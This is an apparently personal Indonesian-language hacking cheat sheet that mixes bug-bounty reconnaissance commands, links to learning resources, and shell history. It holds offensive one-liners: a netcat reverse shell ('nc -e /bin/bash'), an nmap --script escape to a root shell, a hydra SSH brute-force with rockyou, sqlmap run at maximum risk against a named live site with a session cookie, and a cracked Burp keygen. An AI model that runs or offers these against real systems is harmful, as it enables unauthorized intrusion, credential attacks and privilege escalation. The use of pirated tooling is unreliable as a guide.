taksel ( aplikasi )
ps aux | grep ( melihat service yang jalan )
ntpd -gq ( syncron jam )
ntpdate -v pool.ntp.org ( sinkron waktu zona )
.*\.squareup\.com$ ( scan scope burp )
sebelum memakai parallel, install dulu menggunakan apt install parallel
cat redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null
( scan burp )
buka burp
java -jar (burp-loader-keygen-2_1_07.jar)
ganti versi java di linux
sudo update-alternatives --config java
sinkronisasi date
ntpd -gq
ntpdate -v pool.ntp.org ( syncron dengan server )
ntpda
cari nama domain
cat wilcards | assetfinder --subs-only | anew domains
cari host port 80
cat domains | httprobe -c 80 --prefer-https | anew hosts
cari domain
findomain -f wilcards | tee -a findomain.out
nmap -sP ( ping scan / host discovery pada /24, bukan scan service port; di nmap versi baru opsinya -sn )
nmap -v --script vuln ( scan vuln )
cat from-findomain | anew domains | httprobe -c 50 | anew hosts2
caRI ROOT
cat hosts2 | fff -d 1 -S -o roots
masuk ke directory
find . -type f | nano -
grep -hri host22 | anew
1650 grep -hri host22 | anew
grep -hri host23 | anew
1678 ls
1679 gf debug-pages
1680 gf firebase
1681 gf http-auth
1682 gf
1683 gf --help
1684 gf --list
1685 gf xss
gf servers
1689 gf meg-headers
find . -type f | nano
1694 find . -type f | nano -
1695 clear
1696 gf servers | anew
1697 gf meg-headers | nano -
waybackurls api.bugcrowd.com | nano -
1708 curl -vs https://api.bugcrowd.com/robots.txt
1709 waybackurls --get-versions 'https://api.bugcrowd.com/robots.txt'
1710 waybackurls --get-versions 'https://api.bugcrowd.com/robots.txt' | fff -S 200 -d 10 -k -o robot-version
1711 ls
1712 waybackurls --get-versions 'https://api.bugcrowd.com/robots.txt' | fff -S 200 -d 10 -k -o robot-version
find . -type f -name *.body | wc
1731 gf aws-keys
curl -vs https://api.bugcrowd.com/robots.txt | nano -
1881 curl -vs https://api.bugcrowd.com/robots.txt
httpx -o httpx.txt
echo "nama domain" | subfinder -o domain.txt | cat domain.txt | assetfinder --subs-only | tee -a test.txt
cat wilcards cat wilcards | assetfinder --subs-only | anew domains | | httprobe -c 80 --prefer-https
cat wilcards | subfinder -o domain.txt | cat domain.txt | assetfinder --subs-only | anew domains | cat domains | httpx -o aktif
subfinder -d domain | tee
assetfinder --subs-only domain | tee
cat domain(nama domain yang mau di sortir) | sort -u | tee simpan
cat httpx
cat domain | httpx -follow-redirects -status-code -vhost -threads 300 -silent | sort -u | grep "[200]" | cut -d [ -f | sort -u | sed 's/[[:blank:]]*$//' | tee domain
nuclei
sqlmap -u 'https://squareup.com/dashboard/?%27ty%27im!%27#{''''@qw.com' -technique=BEUSTQ --random-agent --risk 3 --level 5 --crawl 10
'_savt=8b8c3c1b-1f...1588e7a635;_onboard_session=UTRKbzJVVkh...45ba573c53;squareGeo=CH-ZH'
tools
ffuf
byp4xx
rapidscan
httpsmuggler / defparam/smuggler
breacher
python3 -c 'ímport pty:pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -m http.server
export TERM=xterm
install repo github agar bisa digunakan secara general
go build . mv /usr/local/bin/
sqlmap -r ( untuk burp atau metode post)
sqlmap -m ( untuk link misal dari gf sqli )
sqlmap -p untuk parameter
sqlmap --force-ssl untuk memaksa request lewat SSL/HTTPS
Untuk filter tulisan
cat scan_aktiftest.txt | cut -d " " -f 4,5,6 | sort -u >> filter.txt
Repo github
1. git init
2. git remote add origin https://github.com/NamaRepo/S.git
git add
git commit -m "first commit"
git push origin master
echo "# ZIMBRA" >> README.md
git init
git add README.md
git commit -m "first commit"
git branch -M main
git remote add origin https://github.com/x0x0r/ZIMBRA.git
git push -u origin main
tools scan port
https://gitlab.com/pokoyo.bughunter/web-security-bug-hunting-trainings/-/issues/433
https://pypi.org/project/threader3000/
https://github.com/dievus/threader3000
https://github.com/RustScan/RustScan
https://www.youtube.com/watch?v=fGG7BMS-RZI
https://www.geeksforgeeks.org/rustscan-faster-nmap-scanning-with-rust/
https://www.geeksforgeeks.org/vulscan-vulnerability-scanning-with-nmap-in-kali-linux/
Link belajar
https://www.hackingarticles.in/ctf-challenges-walkthrough/
https://www.hackingarticles.in/corrosion-2-vulnhub-walkthrough/
https://www.vulnhub.com/entry/corrosion-2,745/
bruteforce
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.0.107 ssh
Command dasar docker compose dan Dockerfile
docker-compose up -d ( buat install )
docker-compose ps -a liat status docker
docker container rm (rmi) ( nama kontainer ) hapus kontainer
docker image prune ( hapus images yang tidak terpakai; tidak menerima nama kontainer )
docker container ls
docker image ls
docker container exec -it (nama kontainer) /bin/bash
docker container start ( nama kontainer )
select * from users;
https://github.com/Darkness4/dvwa-docker.git
https://github.com/Darkness4/dvwa-docker
https://github.com/cytopia/docker-dvwa
https://github.com/digininja/DVWA
tools
https://www.bugbountyhunter.com/guides/?type=bugbounty_toolkit
command cari hash
echo -n "hash nya" | base64 -d
-d ( decode; base64 itu encoding, bukan enkripsi atau hash, jadi ini hanya berhasil kalau string-nya memang base64 )
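nmap shell escape lewat --script ( GTFOBins ): hanya berdampak bila nmap boleh dijalankan via sudo; cek sudoers supaya nmap tidak diberi hak root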
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF
https://gtfobins.github.io/gtfobins/nmap/
nc -lnvp
l = listen
n = numeric only ( tanpa resolusi DNS, alamat dipakai sebagai IP )
v = verbose
p = port
contoh nc -lvnp -s
s = source
nc -e /bin/bash ( ip ) (port)
echo -n ( masukin string nya ) | base64 -d ( untuk decode base64; ini bukan dekripsi hash )
osint
https://sploitus.com/
https://hunter.how/
web archive cdx api
https://archive.org/developers/wayback-cdx-server.html
https://viewdns.info/
http://web.archive.org/cdx/search/cdx?url=*.api.bugcrowd.com&collapse=urlkey&matchType=prefix
CVE-2024-4577